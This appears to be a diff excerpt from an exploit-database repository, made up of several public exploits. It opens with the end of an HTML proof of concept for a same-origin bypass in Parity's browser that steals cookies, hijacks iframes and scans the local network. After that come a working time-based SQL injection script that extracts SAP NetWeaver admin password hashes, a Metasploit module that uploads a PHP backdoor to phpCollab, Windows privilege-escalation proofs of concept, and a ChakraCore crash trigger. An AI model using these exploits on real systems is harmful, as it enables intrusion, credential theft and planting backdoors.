if (!typeof input.on == 'function') return cb({ message: "Not a stream!" })
input.on('data', function(chunk) { hash.update(chunk) })
input.on('end', function() { cb(null, hash.digest()) })
return
}
// non-streaming
if (input) {
return hash.update(input).digest()
}
return hash
}
sha1.file = function(filename, cb) {
if (filename == '-') {
process.stdin.resume()
return sha1(process.stdin, cb)
}
if (typeof fs == 'undefined') fs = require('fs')
return fs.stat(filename, function(err, stats) {
if (err) return cb(err, null)
if (stats.isDirectory()) return cb({ dir: true, message: "Is a directory" })
return sha1(require('fs').createReadStream(filename), cb)
})
}
var base32 = {
Decoder: Decoder,
Encoder: Encoder,
encode: encode,
decode: decode,
sha1: sha1
}
if (typeof window !== 'undefined') {
// we're in a browser - OMG!
window.base32 = base32
}
if (typeof module !== 'undefined' && module.exports) {
// nodejs/browserify
module.exports = base32
}
})();
</script>
<script type="text/javascript">
function new_parity_proxy_url(destination){
//get current webproxy token (we'll just be reusing this one)
var url_decoded = base32.decode(document.location.search.match(/web\/(.*)$/)[1]);
var token = url_decoded.split("+")[0];
console.log(document.location);
console.log(url_decoded);
console.log(token);
console.log(token + "+" + destination);
var new_url = document.location.origin + "/web/" + base32.encode(token + "+" + destination).toUpperCase();
console.log(new_url);
return new_url;
}
function sop_iframe_inject (destination){
d = document.createElement("div");
d.id=destination;
d.style="border-style: dashed";
document.body.appendChild(d);
d_data = document.createElement("div");
i = document.createElement("iframe");
i.sandbox = "allow-same-origin allow-forms allow-pointer-lock allow-scripts allow-popups allow-modals";
i.style = "resize: both; overflow: auto;"
d.appendChild(i);
d.appendChild(d_data);
var proxied_url = new_parity_proxy_url(destination);
i.onload = function() {
//fix the document removing the injection script
var doc = i.contentWindow.document;
var doc_html = doc.documentElement.outerHTML;
doc_html = doc_html.replace("<script src=\"\/parity-utils\/inject.js\"><\/script>","").replace("<\/head><body style=\"background-color: #FFFFFF;\">","");
doc.open();
doc.write(doc_html);
doc.close();
i.contentDocument.head.innerHTML = "<title>INJECTED</title>";
// just do anything
i.contentDocument.body.prepend("!--> Injected from parent frame!");
d_data.innerHTML = "<br><br>";
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] we have full control over iframe:'+destination+'</div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] Child Frames Cookie value: <pre>' + i.contentDocument.cookie + '<pre></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] Child Frames dom title: <pre>' + i.contentDocument.head.title + '<pre></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] Child Frames window.location.href: <pre>' + i.contentWindow.location.href + '<pre></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] we have prepended a body element :<b>!--> Injected from parent frame!</b></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] we have removed inject.js from the target frame:'+destination+'<br></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] source (via xhr): <textarea>'+getUrl(proxied_url).responseText+'</textarea></div>';
};
//navigate to url (poor mans location setter :p)
i.contentWindow.location.replace(proxied_url);
}
function get_lan_ip(cb){
window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; //compatibility for firefox and chrome
var pc = new RTCPeerConnection({iceServers:[]}), noop = function(){};
pc.createDataChannel(""); //create a bogus data channel
pc.createOffer(pc.setLocalDescription.bind(pc), noop); // create offer and set local description
pc.onicecandidate = function(ice){ //listen for candidate events
if(!ice || !ice.candidate || !ice.candidate.candidate) return;
var myIP = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(ice.candidate.candidate)[1];
cb(myIP);
pc.onicecandidate = noop;
};
}
function getUrl(url){
var xhr = new XMLHttpRequest;
xhr.open('GET', url, false); //synchronous.
xhr.send();
return xhr;
};
function find_local_web_interfaces(){
get_lan_ip(function(local_ip){
/** find routers on local lan segment
try .1 and .254 first, otherwise bruteforce
**/
var local_ip_netpart = local_ip.split(".").slice(0,3).join(".")
console.log("your local ip: "+local_ip);
console.log("testing lan segment: " + local_ip_netpart);
function get_candidate_ips(base){
var ret = new Array();
ret.push(1);
ret.push(254);
for(var i=2; i<254; i++){
ret.push(i);
}
return ret;
}
var candidate_ips = get_candidate_ips();
for (i=0;i<candidate_ips.length;i++){
//synchronously. avoid dos'ing parity prx
var probe_ip = local_ip_netpart + "." + candidate_ips[i];
console.log("probing "+probe_ip);
var parity_probe_url = new_parity_proxy_url("http://"+probe_ip);
if (getUrl(parity_probe_url).status<400){
console.log("HIT! - "+probe_ip+" is available! " +parity_probe_url);
sop_iframe_inject(parity_probe_url);
if (document.getElementById("stop_on_first_hit").checked) return;
}
}
});
}
</script>
</head>
<body>
<!-- Fixed navbar -->
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Parity Vulnerability</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="active"><a href="#">Home</a></li>
<li><a href="#contact">Contact</a></li>
</ul>
</div><!--/.nav-collapse -->
</div>
</nav>
<div class="container theme-showcase" role="main">
<!-- Main jumbotron for a primary marketing message or call to action -->
<div class="jumbotron">
<h1>Parity SOP Bypass</h1>
<p>Same-Origin Policy Bypass in Parity's Dapp Browser</p>
</div>
<div class="well">
<p>
<b>Disclaimer</b>
<pre>/* This program is free software. It comes without any warranty, to
* the extent permitted by applicable law. You can redistribute it
* and/or modify it under the terms of the GNU General Public License,
* Version 2, as published by the Free Software Foundation. See
* github.com/tintinweb/pub/tree/master/pocs/cve-2017-18016/
* for more details. */ </pre></p>
</div>
<p>
<button type="button" class="btn btn-primary" onclick="alert('Ok, thanks ;)')">I agree!</button>
</p>
<div class="jumbotron">
<h1 class="display-4">Issue #1</h1>
<p class="lead">Same-Origin Policy (SOP) bypass vulnerability due to parity proxying websites</p>
<hr class="my-4">
<div>
Every webpage you browse to with parity's built-in browser (http://127.0.0.1:8180/#/web) is proxied via http://127.0.0.1:8080.
For example, when you browse to
<ul>
<li>http://google.com's the websites origin changes to 127.0.0.1:8080.</li>
<li>Navigating to http://oststrom.com changes the origin to 127.0.0.1:8080 as it is proxied via parity.</li>
</ul>
Both websites therefore share the same origin rendering a core feature of modern web browsers - the <b>Same-Origin Policy</b> - ineffective.
A website is same-origin if <b>proto, host and port</b> (iexplore does not check port) match.
Bypassing the SOP gives full control over XHR and DOM of child nodes (including iframe source) with the same origin.
</div>
<div class="alert alert-warning" role="alert">
<span class="badge badge-warning">Warning</span> This means, as there's only <u>one origin for all websites</u>, non domain restricted cookies are effectively shared with all websites.
</div>
<b><span class="badge badge-primary">DEMO #1</span> Cookies shared with other websites</b>
<ul>
<li>1) using parity's built-in browser, navigate to any website to set a cookie (e.g. http://google.com)</li>
<li>2) reload this this PoC (https://tintinweb.github.io/pub/pocs/cve-2017-18016/) </li>
<li>3) hit the <b>Display Cookies</b> button</li>
</ul>
<p class="lead">
<textarea id="txtdomcookie"></textarea><br>
<a class="btn btn-primary btn-lg" role="button" onclick="document.getElementById('txtdomcookie').value=document.cookie">Display Cookies</a>
</p>
</div>
<div class="jumbotron">
<h1 class="display-4">Issue #2</h1>
<p class="lead">Parity WebProxy Token Reuse vulnerability</p>
<hr class="my-4">
<div>When navigating to a website with the built-in parity webbrowser a webproxy request token is requested and sent along an encoded request for an url. For example, navigating parity to http://oststrom.com the url gets turned into a proxy url like http://127.0.0.1:8080/web/8X4Q4EBJ71SM2CK6E5AQ6YBNB4NPGX3ME0X2YBVFEDT76X3JDXPJWRVFDM of the form http://127.0.0.1:8080/web/[base32_encode(token+url)].</div>
<br>
<div class="alert alert-warning" role="alert">
<span class="badge badge-warning">Warning</span> When navigating to http://oststrom.com the website can detect that it has been proxied by checking the location.href.
It can further base32 decode and extract the web-proxy token and simply reuse it as the token is not bound to any specifiy request url or hostname allowing any website to create proxy urls and navigate to any other website.
</div>
<div class="alert alert-info" role="alert">
<span class="badge badge-info">Info</span> The parity webbrowser does not allow a proxied website to change the top frames location or open new windows (iframe sandbox).
</div>
<div class="alert alert-warning" role="alert">
<span class="badge badge-warning">Warning</span> However, it allows to perform XHR or embed iframes with script access to proxied locations of arbitrary websites. This allows one website to control any other website since they're both same origin (Issue 1).
</div>
<div class="alert alert-info" role="alert">
<span class="badge badge-info">Info</span> The controlling website has full scripting access to sub-iframes potentially allowing for service enumeration attacks or simulate user interaction.
</div>
<br><br>
<b><span class="badge badge-primary">DEMO #2</span> Full control of arbitrary websites via token reuse and SOP bypass</b>
<ul>
<li>1) enter url into the textbox</li>
<li>2) hit <b>Spawn SOP Iframe</b></li>
</ul>
<b>Notes:</b>
<ul>
<li><span class="badge badge-light">Note</span> the current page can modify/inject arbitrary DOM/scripting into the iframe, access cookies (only the ones stored for 127.0.0.1, potentially from prevs sessions with parity), manipulate change and reload the websites content (e.g. removing parity's inject.js), get the source via XHR</li>
<li><span class="badge badge-light">Note</span> some websites may not load due to js errors. However, since the website has full control it is likely the calling website can fix any js errors occuring in the subframe.</li>
<li><span class="badge badge-light">Note</span> Untested but likely possible: Prepare a transaction to send off ether via parity/web3 api or xhr, open an iframe or perform requests to directly authorize (may require unlock secret) or redress the UI to clickjack the authorization or perform other actions messing with the users account</li>
</ul>
<br>
<p class="lead">
<a class="btn btn-primary btn-lg" role="button" onclick="sop_iframe_inject(document.getElementById('dst').value)">Spawn SOP Iframe</a>
<input type=text value="http://myetherwallet.com" id="dst">
</p>
<br><br>
<b><span class="badge badge-primary">DEMO #3</span> (Chrome) get local lan ip and service scan for web-enabled devices on the LAN to mess with them</b><br>
e.g. search for local router interfaces with default passwords and reconfigure it to perform DNS based redirection attacks (mitm) or similar
<ul>
<li>1) click 'Find LAN-Local WebInterfaces' to scan for devices listening on http port 80 within your LAN (IP .1 to .254)</li>
<li>2) an iframe with full control will be created for each device found on the lan</li>
<li>Note: might require some fixups for the iframe conted to be loaded completely due to parity webproxy messing with header scripts or websites unable to be loaded via iframes. XHR should work though and CSRF tokens can be read from XHR requests or iframe dom (if dom based). See javascript console for debug.</li>
</ul>
<p class="lead">
<a class="btn btn-primary btn-lg" role="button" onclick="find_local_web_interfaces()">Find LAN-Local WebInterfaces</a>
</p>
<input type="checkbox" value="stop_on_first_hit" name="stop_on_first_hit" id="stop_on_first_hit"><label for="stop_on_first_hit">Stop on first device</label>
</div>
<div class="page-header">
<h1 id="contact">Contact</h1>
</div>
<div>
<a href="https://github.com/tintinweb">//tintinweb</a>
</div>
</div> <!-- /container -->
</body>
</html>

1812
exploits/multiple/local/43500.txt Normal file
View file

File diff suppressed because it is too large Load diff

144
exploits/multiple/webapps/43495.py Executable file
View file

@ -0,0 +1,144 @@
#!/usr/bin/env python
# coding=utf-8
"""
Author: Vahagn Vardanyan https://twitter.com/vah_13
Bugs:
CVE-2016-2386 SQL injection
CVE-2016-2388 Information disclosure
CVE-2016-1910 Crypto issue
Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: nw74:50000
Content-Length: 500
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
<soapenv:Header/>
<soapenv:Body>
<sec:deletePermissionById>
<permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
</sec:deletePermissionById>
</soapenv:Body>
</soapenv:Envelope>
In SAP test server I have admin user who login is "Administrator" and so I used this payload
%PRIVATE_DATASOURCE.un:Administrator%
most SAP's using j2ee_admin username for SAP administrator login
%PRIVATE_DATASOURCE.un:j2ee_admin%
You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)
1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#
Instead of J2EE_CONFIGENTRY table you can use this tables
UME_STRINGS_PERM
UME_STRINGS_ACTN
BC_DDDBDP
BC_COMPVERS
TC_WDRR_MRO_LUT
TC_WDRR_MRO_FILES
T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection
T_DOMAIN
T_SESSION
UME_ACL_SUP_PERM
UME_ACL_PERM
UME_ACL_PERM_MEM
An example of a working exploit
C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
this may take a few minutes
Found {SHA-512, 10000, 24}M
Found {SHA-512, 10000, 24}MT
Found {SHA-512, 10000, 24}MTI
Found {SHA-512, 10000, 24}MTIz
Found {SHA-512, 10000, 24}MTIzU
Found {SHA-512, 10000, 24}MTIzUV
Found {SHA-512, 10000, 24}MTIzUVd
Found {SHA-512, 10000, 24}MTIzUVdF
Found {SHA-512, 10000, 24}MTIzUVdFY
Found {SHA-512, 10000, 24}MTIzUVdFYX
Found {SHA-512, 10000, 24}MTIzUVdFYXN
Found {SHA-512, 10000, 24}MTIzUVdFYXNk
Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X
And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text
base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX
"""
import argparse
import requests
import string
_magic = "{SHA-512, 10000, 24}"
_wrong_magic = "{SHA-511, 10000, 24}"
_xml = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " \
"xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n " \
"<sec:deletePermissionById>\r\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, " \
"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{" \
"0}%') AND '1'='1</permissionId>\r\n </sec:deletePermissionById>\r\n </soapenv:Body>\r\n</soapenv:Envelope> "
host = ""
port = 0
_dictionary = string.digits + string.uppercase + string.lowercase
def _get_timeout(_data):
return requests.post("http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean".format(host, port),
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 "
"Firefox/57.0",
"SOAPAction": "",
"Content-Type": "text/xml;charset=UTF-8"
},
data=_xml.format(_data)).elapsed.total_seconds()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--host')
parser.add_argument('--port')
parser.add_argument('-v')
args = parser.parse_args()
args_dict = vars(args)
host = args_dict['host']
port = args_dict['port']
print "start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit ".format(host)
_hash = _magic
print "this may take a few minutes"
for i in range(24): # you can change it if like to get full hash
for _char in _dictionary:
if not (args_dict['v'] is None):
print "checking {0}".format(_hash + _char)
if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server
_hash += _char
print "Found " + _hash
break

104
exploits/php/remote/43519.rb Executable file
View file

@ -0,0 +1,104 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'phpCollab 2.5.1 Unauthenticated File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in phpCollab 2.5.1
which could be abused to allow unauthenticated users to execute arbitrary code
under the context of the web server user.
The exploit has been tested on Ubuntu 16.04.3 64-bit
},
'Author' =>
[
'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery
'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-6090' ],
[ 'EDB', '42934' ],
[ 'URL', 'http://www.phpcollab.com/' ],
[ 'URL', 'https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2017'
))
register_options(
[
OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
])
end
def check
url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
res = send_request_cgi(
'method' => 'GET',
'uri' => url
)
version = res.body.scan(/PhpCollab v([\d\.]+)/).flatten.first
vprint_status("Found version: #{version}")
unless version
vprint_status('Unable to get the PhpCollab version.')
return CheckCode::Unknown
end
if Gem::Version.new(version) >= Gem::Version.new('0')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
id = File.basename(filename,File.extname(filename))
register_file_for_cleanup(filename)
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")
print_status("Uploading backdoor file: #{filename}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'clients/editclient.php'),
'vars_get' => {
'id' => id,
'action' => 'update'
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res && res.code == 302
print_good("Backdoor successfully created.")
else
fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
end
print_status("Triggering the exploit...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "logos_clients/" + filename)
}, 5)
end
end

77
exploits/windows/dos/43514.cs Normal file
View file

@ -0,0 +1,77 @@
/*
Windows: NTFS Owner/Mandatory Label Privilege Bypass EoP
Platform: Windows 10 1709 not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
When creating a new file on an NTFS drive its possible to circumvent security checks for setting an arbitrary owner and mandatory label leading to a non-admin user setting those parts of the security descriptor with non-standard values which could result in further attacks resulting EoP.
Description:
The kernel limits who can arbitrarily set the Owner and Mandatory Label fields of a security descriptor. Specifically unless the current token has SeRestorePrivilege, SeTakeOwnershipPrivilege or SeRelabelPrivilege you can only set an owner which is set in the current token (for the label is can also be less than the current label). As setting an arbitrary owner in the token or raising the IL is also a privileged operation this prevents a normal user from setting these fields to arbitrary values.
When creating a new file on an NTFS volume you can specify an arbitrary Security Descriptor with the create request and it will be set during the creation process. If you specify an arbitrary owner or label it will return an error as expected. Looking at the implementation in NTFS the function NtfsCreateNewFile calls NtfsAssignSecurity which then calls the kernel API SeAssignSecurityEx. The problem here is that SeAssignSecurityEx doesnt take an explicit KPROCESSOR_MODE argument so instead the kernel takes the current threads previous access mode. The previous mode however might not match up with the current assumed access mode based on the caller, for example if the create call has been delegated to a system thread.
A common place this mode mismatch occurs is in the SMB server, which runs entirely in the system process. All threads used by SMB are running with a previous mode of KernelMode, but will create files by specifying IO_FORCE_ACCESS_CHECK so that the impersonated caller identity is used for security checks. However if you specify a security descriptor to set during file creation the SMB server will call into NTFS ending up in SeAssignSecurityEx which then thinks its been called from KernelMode and bypasses the Owner/Label checks.
Is this useful? Almost certainly theres some applications out there which use the Owner or Label as an indicator that only an administrator could have created the file (even if thats not a very good security check). For example VirtualBox uses it as part of its security checks for whether a DLL is allowed to be loaded in process (see my blog about it https://googleprojectzero.blogspot.com.au/2017/08/bypassing-virtualbox-process-hardening.html) so I could imagine other examples including Microsoft products. Another example is process creation where the kernel checks the file's label to determine if it needs to drop the IL on the new process, I don't think you can increase the IL but maybe there's a way of doing so.
Based on the implementation this looks like it would also bypass the checks for setting the SACL, however due to the requirement for an explicit access right this is blocked earlier in the call through the SMBv2 client. Ive not checked if using an alternative SMBv2 client implementation such as SAMBA would allow you to bypass this restriction or whether its still blocked in the server code.
Its hard to pin down which component is really at fault here. It could be argued that SeAssignSecurityEx should take a KPROCESSOR_MODE parameter to determine the security checks rather than using the threads previous mode. Then again perhaps NTFS needs to do some pre-checking of its own? And of course this wouldnt be an issue if the SMB server driver didnt run in a system thread. Note this doesnt bypass changing the Owner/Label of an existing file, its only an issue when creating a new file.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile it first. It will attempt to create two files with a Security Descriptor with the Owner set to SYSTEM.
1) Compile the C# source code file.
2) Execute the PoC as a normal user or at least a filtered split-token admin user.
Expected Result:
Both file creations should fail with the same error when setting the owner ID.
Observed Result:
The first file which is created directly fails with an error setting the owner ID. The second file which is created via the C$ admin share on the local SMB server succeeds and if the SD is checked the owner is indeed set to SYSTEM.
*/
using System;
using System.IO;
using System.Security.AccessControl;
namespace NtfsSetOwner_EoP
{
class Program
{
static void CreateFileWithOwner(string path)
{
try
{
FileSecurity sd = new FileSecurity();
sd.SetSecurityDescriptorSddlForm("O:SYG:SYD:(A;;GA;;;WD)");
using (var file = File.Create(path, 1024, FileOptions.None, sd))
{
Console.WriteLine("Created file {0}", path);
}
}
catch (Exception ex)
{
Console.WriteLine("Error creating file {0} with arbitrary owner", path);
Console.WriteLine(ex.Message);
}
}
static void Main(string[] args)
{
try
{
Directory.CreateDirectory(@"c:\test");
CreateFileWithOwner(@"c:\test\test1.txt");
CreateFileWithOwner(@"\\localhost\c$\test\test2.txt");
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
}
}

40
exploits/windows/dos/43515.txt Normal file
View file

@ -0,0 +1,40 @@
Windows: NtImpersonateAnonymousToken AC to Non-AC EoP
Platform: Windows 10 1703 and 1709
Class: Elevation of Privilege
Summary:
The check for an AC token when impersonating the anonymous token doesnt check impersonation tokens security level leading to impersonating a non-AC anonymous token leading to EoP.
Description:
There's a missing check for impersonation level in NtImpersonateAnonymousToken when considering if the caller is currently an AC. This results in the function falling into the restricted token case if the caller is impersonating a non AC token at identification or below. Some example code is shown highlighting the issue.
SeCaptureSubjectContext(&ctx);
PACCESS_TOKEN token = ctx.ClientToken;
if (!ctx.ClientToken) <--- Should check the token's impersonation level here, and fallback to the PrimaryToken.
token = ctx.PrimaryToken;
if (token->Flags & 0x4000) {
// ... Impersonate AC anonymous token.
} else if (!SeTokenIsRestricted(PsReferencePrimaryToken())) { <-- AC PrimaryToken isn't restricted so this check passes
// ... Impersonate normal anonymous token.
}
For example when using a split-token admin you can trivially get the linked token and impersonate that. As an AC token isn't restricted this results in impersonating the normal anonymous token which is arguably less restricted than the AC token in some cases and is certainly less restricted than the anonymous AC token which is normally created using SepGetAnonymousToken. For example you can open objects with a NULL DACL if you can traverse to them or open devices which would normally need the special AC device object flag for traversal across the object namespace. You can also access the anonymous token's device map and modify it, potentially leading to bypass of symbolic link protections in certain cases.
Proof of Concept:
Ive provided a PoC as a C# project. The PoC will respawn itself as the Microsoft Edge AC and then execute the exploit. You must run this as a UAC split token admin. Note that this ISNT a UAC bypass, just that a split-token admin has a trivial way of getting a non-AC token by requesting the linked token.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. Ensure the main executable and DLLs are in a user writable location (this is needed to tweak the file permissions for AC).
2) Execute the PoC as normal user level split-token admin.
3) Once complete a dialog should appear indicating the operation is a success.
Expected Result:
The AC anonymous token is impersonated, or at least an error occurs.
Observed Result:
The Non-AC anonymous token is impersonated.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43515.zip

28
exploits/windows/dos/43516.txt Normal file
View file

@ -0,0 +1,28 @@
Windows: NtImpersonateAnonymousToken LPAC to Non-LPAC EoP
Platform: Windows 10 1703 and 1709 (not tested Windows 8.x)
Class: Elevation of Privilege
Summary:
When impersonating the anonymous token in an LPAC the WIN://NOAPPALLPKG security attribute is ignored leading to impersonating a non-LPAC token leading to EoP.
Description:
When running in LPAC the WIN://NOAPPALLPKG attribute is used to block the default use of the ALL APPLICATION PACKAGES sid. When impersonating the anonymous token this attribute isn't forwarded on to the new token in SepGetAnonymousToken. This results in being able to impersonate a "normal" AC anonymous token which could result in getting more access to the system (such as anything which is marked as ANONYMOUS LOGON and ALL APPLICATION PACKAGES but not ALL RESTRICTED APPLICATION PACKAGES or a specific capability SID).
Proof of Concept:
Ive provided a PoC as a C# project. The PoC will respawn itself as the Microsoft Edge LPAC and then execute the exploit.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. Ensure the main executable and DLLs are in a user writable location (this is needed to tweak the file permissions for AC).
2) Execute the PoC as normal user
3) Once complete a dialog should appear indicating the operation is a success.
Expected Result:
The anonymous token is an LPAC.
Observed Result:
The anonymous token is a normal AC.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43516.zip

36
exploits/windows/dos/43517.txt Normal file
View file

@ -0,0 +1,36 @@
Windows: SMB Server (v1 and v2) Mount Point Arbitrary Device Open EoP
Platform: Windows 10 1703 and 1709 (seems the same on 7 and 8.1 but not extensively tested)
Class: Elevation of Privilege
Summary:
The SMB server driver (srv.sys and srv2.sys) don't check the destination of a NTFS mount point when manually handling a reparse operation leading to being able to locally open an arbitrary device via an SMB client which can result in EoP.
Description:
Note before I start event though this involves SMB this is only a local issue, I don't know of anyway to exploit this remotely without being able to run an application on the local machine.
NTFS mount points are handled local to the SMB server so that the client does not see them. This is different from NTFS symbolic links which are passed back to the client to deal with. In order to handle the symbolic link case the server calls IoCreateFileEx from Smb2CreateFile passing the IO_STOP_ON_SYMLINK flag which results in the IoCreateFileEx call failing with the STATUS_STOPPED_ON_SYMLINK code. The server can then extract the substitution path from the reparse pointer buffer and either pass the buffer to the client if it's a symbolic link or handle it if it's a mount point.
The way the server handles a symbolic link is to recall IoCreateFileEx in a loop (it does check for a maximum iteration count although I'd swear that's a recent change) passing the new substitute path. This is different to how the IO manager would handle this operation. In the IO manager's case the reparse operation is limited to a small subset of device types, such as Disk Volumes. If the new target isn't in the small list of types then the reparse will fail with an STATUS_IO_REPARSE_DATA_INVALID error. However the SMB server does no checks so the open operation can be redirected to any device. This is interesting due to the way in which the device is being opened, it's in a system thread and allows a caller to pass an arbitrary EA block which can be processed by the device create handler.
One use for this is being able to the spoof the process ID and session ID accessible from a named pipe using APIs such as GetNamedPipeClientProcessId. Normally to set these values to arbitrary values requires kernel mode access, which the SMB driver provides. While you can open a named pipe via SMB anyway in that case you can't specify the arbitrary values as the driver provides its own to set the computer name accessible with GetNamedPipeClientComputerName. I've not found any service which uses these values for security related properties.
Note that both SMBv1 and SMBv2 are vulnerable to the same bug even the code isn't really shared between them.
Proof of Concept:
Ive provided a PoC as a C# project. It creates a mount point to \Device and then tries to open the CNG driver directly and via the local share for the drive.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Execute the PoC as a normal user.
Expected Result:
Both direct and via SMB should fail with STATUS_IO_REPARSE_DATA_INVALID error.
Observed Result:
The direct open fails with STATUS_IO_REPARSE_DATA_INVALID however the one via SMB fails with STATUS_INVALID_INFO_CLASS which indicates that the CNG driver was opened.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43517.zip

44
exploits/windows/dos/43522.js Normal file
View file

@ -0,0 +1,44 @@
/*
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.
growby = endSeg->length;
current = current->GrowByMin(recycler, growby);
CopyArray(current->elements + endIndex + 1, endSeg->length,
((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
if (HasNoMissingValues())
{
if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
{
SetHasNoMissingValues(false);
}
}
In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method.
I guess it shoud be like:
if (current == head && HasNoMissingValues())
{
if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
{
SetHasNoMissingValues(false);
}
}
*/
function trigger() {
let arr = [1.1];
let i = 0;
for (; i < 1000; i += 0.5) {
arr[i + 0x7777] = 2.0;
}
arr[1001] = 35480.0;
for (; i < 0x7777; i++) {
arr[i] = 1234.3;
}
}
for (let i = 0; i < 100; i++) {
trigger();
}

111
exploits/windows/remote/43518.rb Executable file
View file

@ -0,0 +1,111 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Seh
